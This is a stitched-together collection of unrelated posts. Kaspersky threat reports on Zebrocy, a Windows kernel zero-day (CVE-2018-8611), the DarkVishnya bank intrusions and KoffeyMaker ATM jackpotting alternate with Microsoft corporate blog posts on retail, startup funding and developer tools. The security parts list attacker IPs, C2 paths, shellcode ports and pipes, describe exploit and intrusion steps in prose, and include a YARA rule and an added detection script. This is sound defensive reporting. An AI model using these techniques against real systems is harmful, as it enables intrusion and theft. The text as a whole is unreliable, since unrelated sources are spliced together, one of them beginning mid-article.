Zebrocy Go downloader targets in 2018 continue to be organizations related to Central Asian government foreign policy and administration. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.

And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

Microsoft at NRF: Delivering on the promise of intelligent retail

A few days from now, retailers from around the world will converge in New York for the National Retail Federation (NRF) Big Show, the world’s largest retail conference. Every year, this event feels like a fresh beginning for retailers; just off their busiest time of year, they’re ready to not only celebrate but also reflect on what went well and improvements for next year. And every year, it feels like the stakes have never been higher – changing consumer demands combined with a retail model that’s constantly in flux creates an urgency to figure out what’s next.

I love coming to NRF. I joined Microsoft about five months ago, but I’m a retailer at heart. I literally grew up in retail, spending weekends at grocery stores with my dad rearranging coffee cans as part of our family business. Later I ran CRM and digital marketing for Gap Inc.’s brands. Now, I’m feeling even closer to retailers today than ever because I’m working for a company committed to building and maintaining retailers’ trust, working together to deliver intelligent solutions that help retailers delight shoppers, empower their employees, transform their supply chains and reimagine their businesses.

Given my retail background, I particularly appreciate Microsoft’s commitment to be a good partner by recognizing that retailers’ customers, employees and data belong to them. We want to put retailers in control of the pieces they need to make their businesses wildly successful for years to come.

So how is Microsoft delivering on that promise?

Bringing customer-first innovation to market

At Microsoft, we look to bring to market products and services that work seamlessly together to help retailers do more and take advantage of the latest technologies like AI, machine learning and IoT across the entire organization. Leading retailers are already using the Microsoft Cloud as a competitive differentiator, from using AI to create transformative customer and employee experiences, to embracing IoT to leverage their supply chains for maximum customer impact, to using cloud-based business applications to manage everything from the customer journey to operations. In an industry experiencing accelerating change, Microsoft and its partners are creating the solutions to help our customers keep up.

Empowering employees with the right tools is an area I think is especially ripe for innovation. For example, Firstline Workers, such as retail associates, are the first point of contact between a company and its customers or products, and are the lifeblood of the retail industry. They represent a retailer’s brand and need better access to resources and expertise to deliver great customer experiences and drive the bottom line. There’s also a huge opportunity to give these employees a more streamlined experience at work by modernizing some of the busy work that takes time away from customer service, such as scheduling and task management.

That is why I’m excited to announce new capabilities in Microsoft Teams for Firstline Workers. A new customizable mobile Teams experience makes it easy for them to connect with anyone in the organization and access just the apps and services they need while on the job. It includes features like the ability to share location and a smart camera. We are also announcing a new API to connect Teams to workforce management systems so employees no longer need to login to different systems, but can access everything in Teams as a hub for their workday. Finally, a new Praise tool makes it easy for managers and employees to recognize their peers and build a culture of teamwork.

Microsoft built all this innovation to help retail employees and other Firstline Workers get out of the backroom and onto the store floor, interacting with customers, creating great experiences and building loyalty. As always, it all comes back to the customer.

Putting our trusted business model to work for our customers

I’m proud to say retailers are already realizing the value in working with us and our partners to drive success. Just in the past few months, we’ve announced incredible partnerships with some of retail’s biggest names, including Starbucks, Walmart and – one that’s particularly close to my heart – Gap, Inc. And just this week, we announced a partnership with Kroger to power a new connected-experience store pilot and jointly bring digital solutions to market that will empower other retailers to transform their own operations and create their own amazing customer experiences.

For each of these customers, we’re bringing to bear our technology and our brightest retail minds to help them build a foundation for success in this ever-changing market.

We don’t just sell another commodity to retailers. Our superpower is bringing together our global network of partners to work side-by-side with retailers and understand their greatest challenges and opportunities. Together, we go beyond simply finding solutions – we’re redefining categories and establishing new business models. This is how we’re enabling intelligent retail – by offering the best-in-class solutions and industry expertise that’s helping retailers know their customers better, empower their people in new ways, deliver on an intelligent supply chain and reimagine retail.

I’m excited to highlight many other retail brands in our booth at NRF that are working with Microsoft and our partners to embrace intelligent retail:

  • On the heels of this week’s news, I’m excited to showcase Kroger’s Microsoft Azure-powered Retail as a Service (RaaS) offering to NRF attendees. The solutions are not only enabling Kroger to transform the grocery experience for its customers with a personalized guided shopping experience, but are also opening a completely new revenue stream for Kroger, as they partner with us to market the solutions to other retailers. Centered around Kroger’s EDGE Shelf, which uses digital displays instead of traditional paper tags to indicate everything from prices and promotions to nutritional and dietary information, RaaS connects the shelf to the company’s Scan, Bag, Go® to create a unique guided shopping experience for customers.
  • Starbucks is using Azure Sphere within select equipment to enable its partners (employees) more opportunity to engage with customers. This includes everything from beverage consistency, waste reduction, the management of energy consumption and predictive maintenance.
  • Arts and crafts supply store Michaels is working with Microsoft partner TokyWoky to identify potential ambassadors online and leverage their knowledge and expertise to build a digital community of makers. Using Microsoft Azure, Azure AI and Power BI, TokyWoky’s 24/7 chat technology helps retailers like Michaels provide their customers with a human, personalized experience that’s not restricted by the size of its customer service workforce. TokyWoky’s platform encourages customers to assist and answer questions from other customers, all within the Michaels site, resulting in four- to six-times more questions being answered than before. The solution also creates continuous user-generated content across michaels.com, which helps to drive trust and conversion.
  • Goodwill of Central and Northern Arizona (GCNA) partnered with DXC Technology to implement Microsoft Dynamics 365 as its retail management and Point of Sale (POS) solution. DXC’s Dynamics-based solution enables GCNA to collect detailed information on the items it sells. This is combined with category detail on items its stores produce from donated goods (collected from a GCNA proprietary and custom application) to maximize revenue. This is especially important for GCNA, whose revenue directly funds its mission – to empower individuals, strengthen families, and build stronger communities, and move towards its vision – to end poverty through the power of work.
  • Italian luxury lifestyle brand Stefano Ricci is using partner SBSoft’s Dynamics-based CRM4Retail solution to give employees a high-level view of information to help them provide the white-glove experience its shoppers expect. Online, the database produces recommendations based on how customers are navigating the website. The application for stores helps retail employees understand and anticipate customer needs and answer customer questions in a matter of seconds. It also assists in the development of targeted, data-driven campaigns and promotions.
  • Wine and liquor store BevMo! has partnered with Fellow Inc. to use its Fellow Robots to connect supply chain efficiency with customer delight. Delivered using Power BI and powered by Microsoft Azure, Azure AI and Azure Machine Learning, the robot provides perfect product location using image recognition and utilizes suggestive selling to offer customers different types of products and integrate point of sale interactions. A new integration point from Fellow to the “My Retailer app” of each retailer helps customers locate their favorite items in the store and suggests other items the customer may like. BevMo! is also using Microsoft’s intelligent cloud solutions to empower its store associates for better customer service.
  • Retailers such as children’s clothing brand Polarn O Pyret are turning to the Unified Commerce Alliance (UCA) solution – powered by Azure AI and data platform and Dynamics 365 for Retail, in addition to partner-driven solutions from Avensia Storefront, Episerver and InRiver PIM – to help them reimagine retail by joining and sharing data and business logic from different systems and channels through a single, secure and scalable system in the Azure cloud. The UCA cloud solution provides one source of truth across all retail functionality – POS, pricing, campaign, stock and warehouse management. This one-stop shop provides everything a retailer needs to manage all digital store experiences, online and offline.

Connect with us at NRF

Microsoft will have a big presence at NRF, including 20 solution demos in our booth, sessions led by our retail experts and tours of our own Microsoft Store to show how Microsoft runs on Microsoft – and if you plan to be there, come see us! Visit us in booth #3301 to experience for yourself the solutions and customer stories I mention above, or attend one of our sessions on the show floor – I’m leading a Big Ideas session where I’ll talk about what we learned over the holiday season and chat with retailers you know and love about how they’re working with Microsoft to create amazing experiences for their customers. In addition, my colleague Alysa Taylor, Corporate Vice President for Business Applications and Industry Marketing, and I will be among several “women rocking retail” participating in The Girls’ Lounge at NRF (Microsoft is also a sponsor!). And don’t miss Chris Capossela, our Chief Marketing Officer, as he leads a session on Tuesday highlighting the importance of brand. And of course, you can visit Microsoft’s NRF page to keep up to date on the latest news developments.

Despite retail’s breakneck rate of change, there’s never been a more exciting time to be a retailer. I’m excited to be a part of it, bringing Microsoft’s solutions and trusted business model to my retail colleagues around the world. And I’m here to tell every retailer: if we don’t have a solution for your business, we – along with our hundreds of global partners – will build it for you. I can’t wait to see what we’ll create together.


The post Microsoft at NRF: Delivering on the promise of intelligent retail appeared first on The Official Microsoft Blog.

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System Call Filtering, which is used, among others, in the Microsoft Edge sandbox, and the Win32k Lockdown Policy employed in the Google Chrome sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web browsers.

We have found multiple builds of the exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability, the exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects and transaction objects, and creates a large number of enlistment objects for what we will call “Transaction #2”. An enlistment is a special object that is used for the association between a transaction and a resource manager. When the transaction state changes, the associated resource manager is notified by the KTM. After that, the exploit creates one more enlistment object, only now it does so for “Transaction #1”, and commits all the changes made during this transaction.
After all the initial preparations have been made, the exploit proceeds to the second part of the vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of the created threads calls NtQueryInformationResourceManager in a loop, while a second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses the trick of executing NtQueryInformationThread to obtain information on the latest executed syscall of the second thread. Successful execution of NtRecoverResourceManager means that the race condition has occurred, and a subsequent WriteFile on the previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. It was later shared through the Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Announcing the Female Founders Competition winners

Earlier this year, our corporate venture fund, M12, took an important step in helping identify promising women entrepreneurs and accelerating their access to capital. Partnering with EQT Ventures and SVB Financial Group, we launched the Female Founders Competition, awarding $4M to two women-led companies building innovative software solutions for the enterprise.

Those following this industry are well aware of the hard truths women founders face when seeking funding: just 17 percent of all startups boast a single female founder; and of that small percent, only 2.2 percent of total global venture capital funding went to female founders over the past two years. While the numbers clearly indicate there’s a need to do more, many investors struggle with where to start.

There are plenty of women entrepreneurs focused on solving enterprise technology challenges, but we needed a better way of finding them. With the previous success in sourcing incredibly promising portfolio companies from our Innovate.AI competition, we decided to try a competition again, but this time focused on surfacing female founders. And the results spoke volumes.

We received hundreds of submissions from female founders building enterprise solutions that spanned a multitude of industries and countries. This competition, while a small step to shift how we sourced deals, not only showed us that there is more than one way to effectively discover talent and expand networks, but also that it’s our responsibility as venture capitalists to begin leveling the playing field so those companies receiving funding are a truer reflection of the world in which we live.

Today, it’s my pleasure to share the results of the Female Founders Competition, and the stories behind the two incredible women whose companies will now join our portfolio.

Acerta

Greta Cutulenco, CEO and co-founder of Acerta, began her journey as a software engineering student at the University of Waterloo in Ontario, Canada, where she developed an interest in robotics and autonomous vehicle systems. While working on a research project with Sebastian Fischmeister, a professor at the university, she became fascinated with recent developments in connected and autonomous vehicles, sparking a career that led her to work with and learn from automotive original equipment manufacturers (OEMs) and Tier-1 manufacturers before returning to her roots in research. Cutulenco, Fischmeister and another colleague, Jean-Christophe Petkovich, would go on to create Acerta, using machine learning to provide real-time malfunction detection and failure prediction in vehicles. To commercialize their work, Cutulenco spent time in local incubators and attending business and sales courses before securing Acerta’s participation in the Techstars Mobility accelerator in Detroit. Just over two years later, Acerta has grown from a team of three to nearly 20, with Greta recently being named to Forbes 30 under 30 for Manufacturing and Industry, the company gaining traction with some of the largest auto manufacturers as customers, and now becoming a winner of the Female Founders competition.

“We are thrilled for the opportunity to work with M12, EQT Ventures, and SVB Financial Group,” said Cutulenco. “The funding and ongoing support will bring a big boost to the company’s long-term growth.”


Greta Cutulenco, CEO and co-founder of Acerta

Mental Canvas

Julie Dorsey, founder and chief scientist of Mental Canvas, trained as an architect before becoming a world-class computer scientist specializing in computer graphics. Her appreciation for, and expertise in, these two disciplines inspired her to create the core technology behind Mental Canvas, which reimagines sketch for the digital age by augmenting it with spatial strokes, 3D navigation, and free-form animations. As its early customers show, Mental Canvas is a platform that addresses a wide and varied market, spanning industries from architecture, concept development for movies, animation and games, product design, education, and scientific illustration. Dorsey is also a professor of computer science at Yale University, and previously was on the faculty at MIT, where she held tenured appointments in the departments of Electrical Engineering & Computer Science and Architecture. She is an inventor on more than a dozen awarded and four pending patents, and for the past two years has devoted herself full-time to her vision of enhancing visual communication by fundamentally elevating the way people draw.

“It is a great honor to be recognized in this way,” said Dorsey. “Of course, we are pleased with the funding, but even more, we are thrilled by the recognition and affirmation this prize provides. It says to me and our team that the technology Mental Canvas is developing to bring sketch into the digital age is groundbreaking and impactful. We look forward to working with M12, EQT Ventures and SVB Financial Group to make our company’s vision a reality.”


Julie Dorsey, founder and chief scientist of Mental Canvas

This afternoon, I’ll join the next generation of female leaders at a forum focused on building and nurturing this community and preparing them for what’s next. While it’s a great way to welcome our winners to the M12 portfolio, it’s also an opportunity to continue this journey – one that is very personal to me – of doing our part to ensure that everyone has a seat at the table.


The post Announcing the Female Founders Competition winners appeared first on The Official Microsoft Blog.

DarkVishnya: Banks attacked through direct connection to local network

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.


High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe, to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe
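The indicators above (the two shellcode listener ports, the three reverse-connection ports and the two named pipes) are the kind a responder would sweep hosts for. The following is an added detection example, not code from the Securelist post: it matches those indicators against `netstat -ano` rows and Sysmon pipe events (event IDs 17/18) rendered as text. Every sample line, host name and 10.x address is constructed; matching is keyed on ports and pipe names because the post masks the peer addresses.

```python
"""Added detection example for the DarkVishnya network indicators; all
sample input below is constructed, not taken from the incidents."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators from the post. Peer addresses are masked there (10.**.*.***),
# so nothing here matches on an IP address.
LISTENER_PORTS = {5190, 7900}          # tcp://0.0.0.0:5190, :7900
CONNECT_PORTS = {4444, 4445, 31337}    # shellcode reverse connections
PIPE_NAMES = {"xport", "s-pipe"}       # \\.\xport, \\.\s-pipe


@dataclass(frozen=True)
class Hit:
    kind: str     # "listener", "connect" or "pipe"
    detail: str   # matching socket or pipe name
    pid: str      # owning PID where the source gives one, else ""
    line: str     # raw evidence line


# `netstat -ano` row: Proto  Local Address  Foreign Address  State  PID
NETSTAT_RE = re.compile(
    r"^\s*TCP\s+(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<faddr>\S+):(?P<fport>\S+)"
    r"\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$"
)
# Sysmon pipe created / connected event flattened to "PipeName: \name"
PIPE_RE = re.compile(r"PipeName:\s*(?P<name>\\\S+)", re.IGNORECASE)


def scan_netstat_line(line: str) -> Optional[Hit]:
    """Flag a local TCP server on a listener port, or an outbound session
    to one of the reverse-connection ports."""
    m = NETSTAT_RE.match(line)
    if not m:
        return None
    state = m["state"].upper()
    lport = int(m["lport"])
    if state == "LISTENING" and lport in LISTENER_PORTS:
        return Hit("listener", f"{m['laddr']}:{lport}", m["pid"], line.strip())
    if (m["fport"].isdigit() and int(m["fport"]) in CONNECT_PORTS
            and state in ("ESTABLISHED", "SYN_SENT")):
        return Hit("connect", f"{m['faddr']}:{m['fport']}", m["pid"], line.strip())
    return None


def pipe_basename(name: str) -> str:
    # Reduce \\.\xport, \xport or \\.\pipe\xport to the bare name "xport"
    # so the same indicator matches however the source renders the pipe.
    return name.rstrip("\\").rsplit("\\", 1)[-1].lower()


def scan_pipe_line(line: str) -> Optional[Hit]:
    m = PIPE_RE.search(line)
    if not m:
        return None
    if pipe_basename(m["name"]) in PIPE_NAMES:
        return Hit("pipe", m["name"], "", line.strip())
    return None


def scan(netstat_lines: List[str], pipe_lines: List[str]) -> List[Hit]:
    hits = [h for h in map(scan_netstat_line, netstat_lines) if h]
    hits += [h for h in map(scan_pipe_line, pipe_lines) if h]
    return hits


def pids_with_hits(hits: List[Hit]) -> List[str]:
    """PIDs owning any flagged socket: the processes to pivot on first."""
    return sorted({h.pid for h in hits if h.pid})


# Constructed netstat output: one benign listener, one benign HTTPS session
# and three rows matching the indicators.
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135          0.0.0.0:0            LISTENING       912
  TCP    0.0.0.0:5190         0.0.0.0:0            LISTENING       4120
  TCP    10.0.5.17:49811      10.0.9.200:4444      ESTABLISHED     4120
  TCP    10.0.5.17:49812      10.0.9.200:443       ESTABLISHED     2290
  TCP    0.0.0.0:7900         0.0.0.0:0            LISTENING       4120
""".splitlines()

# Constructed Sysmon pipe events (IDs 17/18) flattened to key: value text.
SAMPLE_SYSMON = [
    "EventID: 17 PipeName: \\PSHost.1.0 Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "EventID: 18 PipeName: \\xport Image: C:\\Users\\Public\\svc.exe",
    "EventID: 17 PipeName: \\s-pipe Image: C:\\Users\\Public\\svc.exe",
]

if __name__ == "__main__":
    found = scan(SAMPLE_NETSTAT, SAMPLE_SYSMON)
    for hit in found:
        print(f"[{hit.kind}] {hit.detail} pid={hit.pid or '-'}  <- {hit.line}")
    print("PIDs to pivot on:", pids_with_hits(found))
```

On a live host the same functions can be fed the output of `netstat -ano` and exported Sysmon events; a hit is a lead to triage, not proof of compromise, since the ports are not reserved to this malware.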

Empowering every developer to achieve more at Microsoft Connect(); 2018

As we share our new innovations for every developer at Connect(); 2018 today, I’m reminded that now, more than ever, we’re moving towards a world of ubiquitous computing where technology is responsible for transforming every consumer and business experience. For developers, the opportunity to use technologies like AI, IoT, serverless compute, containers and more has never been greater. I’m excited to share some of the latest things we’re working on at Microsoft to help developers achieve more when building the applications of tomorrow, today.

Tools for every developer

As a company built by developers and for developers, we understand the opportunities and challenges that developers face every day. Today, we are continuing to deliver developer tools and Azure services that help you be more innovative and productive than ever.

I’m excited to announce the general availability of Azure Machine Learning service, which enables developers and data scientists to efficiently build, train and deploy machine learning models. Using Azure Machine Learning, you can automate model selection and tuning, increase productivity with DevOps for machine learning, and deploy models with one click. With its tool-agnostic Python SDK, Azure Machine Learning service can be used in any Python environment with your favorite open source frameworks.

Over 12 million developers around the world use Visual Studio to build new applications and enhance existing ones. Today, Visual Studio 2019 Preview and Visual Studio 2019 for Mac Preview are available for download. With numerous improvements to capabilities like IntelliCode for AI-assisted IntelliSense, expanded refactoring capabilities and smarter debugging, developers can spend more time focusing on writing code. Developers can now collaborate in real time with Live Share and the new GitHub pull request capabilities. And developers using Azure will find better support than ever, whether you’re modernizing with containers or building cloud-native solutions with serverless technology.

.NET Core 3 Preview is now available, bringing the Windows Presentation Foundation (WPF) and Windows Forms application frameworks to .NET Core. This enables more flexible deployment with side-by-side and self-contained EXEs, better performance and the ability to use native Universal Windows Platform (UWP) controls in Windows Forms and WPF applications via XAML islands. On the server side, check out composable UIs with ASP.NET Core using Razor Components, which provide full-stack web development with .NET for the first time.

For developers looking to build cloud-native, data-driven applications, Azure Cosmos DB offers a fully managed, globally distributed database which supports NoSQL workloads and guarantees less than 10-millisecond low latency and high availability. Today, we’re announcing the general availability of Azure Cosmos DB Shared Throughput Offer with a lowered minimum entry of 400 request units or $24 per month — a 25 times lower entry point — which makes Azure Cosmos DB more accessible to developers who have databases with multiple ‘Azure Cosmos DB containers’.

Microsoft <3 open source

At the heart of great developer innovation is community, and that’s why open source is so important. We’re committed to empowering developers at every stage of the development lifecycle — from ideation to collaboration to deployment. Our announcements today are not only about open-sourcing more of our own products for community collaboration and contribution, but also about how we are actively investing in collaborating on initiatives with others.

Modern container applications often include a variety of components such as containers, databases and virtual machines, and therefore need an easy way to package and maintain the apps in different environments. Today, I’m excited to introduce Cloud Native Application Bundles (CNAB), a new open source package format specification created in close partnership with Docker and supported by HashiCorp, Bitnami and more. With CNAB, you can manage distributed applications using a single installable file, reliably provision application resources in different environments and easily manage the application lifecycle without having to use multiple toolsets.

A year ago, we introduced Virtual Kubelet (VK), providing a pluggable architecture to extend the Kubernetes API to deploy and manage containers in compute environments like serverless and edge. Since then, a number of VK providers have been added, enabling integrations with multiple services such as Azure Container Instances, AWS Fargate, Alibaba ECI and Azure IoT Edge. Today, we are donating the Virtual Kubelet project to the Cloud Native Computing Foundation (CNCF). By working within the CNCF, we can encourage even more participation and innovation in the community to integrate Kubernetes orchestration with more environments.

I’m also happy to share that we’re delivering on top requests from the .NET community by open-sourcing Windows Presentation Foundation (WPF), Windows Forms and WinUI XAML Library (WinUI). The initial commits add many namespaces and APIs, with more in the coming months. We look forward to receiving your contributions to these repos.

Easier access to technology enables freedom of choice for developers to select the best solution for the project at hand. Today, we’re announcing that the Azure Database for MariaDB service is now generally available. This enterprise-ready, fully managed service for MariaDB community edition provides built-in high availability and elastic scaling, as well as flexible pricing.

Serverless for all

We’re excited to bring the benefits of serverless computing to every app pattern. Whether you are building event-driven functions, running container workloads orchestrated by Kubernetes or simply managing APIs implemented on any platform, you can do it all without worrying about the underlying infrastructure.

Powered by the open source Virtual Kubelet technology, the Azure Kubernetes Service (AKS) virtual node public preview enables serverless Kubernetes. With this new feature, you can elastically provision additional compute capacity in seconds. With a few clicks in the Azure portal, you can turn on the virtual node capability and get the flexibility and portability of a container-focused experience in your AKS environment without worrying about managing the additional compute resources.

Azure Functions enables you to build serverless, event-driven applications in the language of your choice, including .NET, JavaScript and Java. Today, we extend this further with Python support to Azure Functions. Build Linux-based functions using Python either as code or as a Docker container, while enjoying an end-to-end development experience — build, debug/test, publish — using local tooling such as CLI and Visual Studio. Python support brings the serverless approach to machine learning and automation scenarios.

These are just a few of the new tools and services we announced today. I encourage you to look through all the updates and join the live interactive coding sessions at Connect(); 2018. Tune in online today or watch on-demand, explore the code samples shown throughout the event and share what you think on social media (#MSFTConnect). I can’t wait to see what you will build next.


The post Empowering every developer to achieve more at Microsoft Connect(); 2018 appeared first on The Official Microsoft Blog.

KoffeyMaker: notebook vs. ATM

Despite CCTV and the risk of being caught by security staff, attacks on ATMs using a direct connection — so-called black box attacks — are still popular with cybercriminals. The main reason is the low “entry requirements” for would-be cyber-robbers: specialized sites offer both the necessary tools and how-to instructions.

Kaspersky Lab’s experts investigated one such toolkit, dubbed KoffeyMaker, in 2017-2018, when a number of Eastern European banks turned to us for assistance after their ATMs were quickly and almost freely raided. It soon became clear that we were dealing with a black box attack — a cybercriminal opened the ATM, connected a laptop to the cash dispenser, closed the ATM, and left the crime scene, leaving the device inside. Further investigation revealed the “crime instrument” to be a laptop with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a connection to a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7 for better driver compatibility.


ATM dispenser connected to a computer without the necessary drivers

The situation then unfolded according to the usual scenario: the cybercriminal returned at the appointed hour and pretended to use the ATM, while an accomplice remotely connected to the hidden laptop, ran the KDIAG tool, and instructed the dispenser to issue banknotes. The attacker took the money and later retrieved the laptop, too. The whole operation could well be done solo, but the scheme whereby a “mule” handles the cash and ATM side, while a second “jackpotter” provides technical support for a share of the loot, is more common. A single ATM can spit out tens of thousands of dollars, and only hardware encryption between an ATM PC and its dispenser can prevent an attack from occurring.

Overall, the attack was reminiscent of Cutlet Maker, which we described last year, except for the software tools. We were able to reproduce all the steps of KoffeyMaker in our test lab. All the required software was found without too much difficulty. Legitimate tools were used to carry out the attack with the exception of the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a. Note that the same version of this program was previously used by cybercriminals from the Carbanak group.

Hash sums

KDIAG, incl. patched files

Drivers

YARA rule

rule software_zz_patched_KDIAG
{
    meta:
        author = "Kaspersky Lab"
        filetype = "PE"
        date = "2018-04-28"
        version = "1.0"
        hash = "49c708aad19596cca380fd02ab036eb2"

    strings:
        $b0 = { 25 80 00 00 00 EB 13 FF 75 EC }
        $b1 = { EB 1F 8D 85 FC FE FF FF 50 68 7B 2F 00 00 }
        $s0 = "@$MOD$ 040908 0242/0000 CRS1.EXE W32 Copyright (c) Wincor Nixdorf"

    condition:
        (
            uint16(0) == 0x5A4D and
            all of ( $s* ) and
            all of ( $b* )
        )
}

Kaspersky Security Bulletin 2018. Statistics

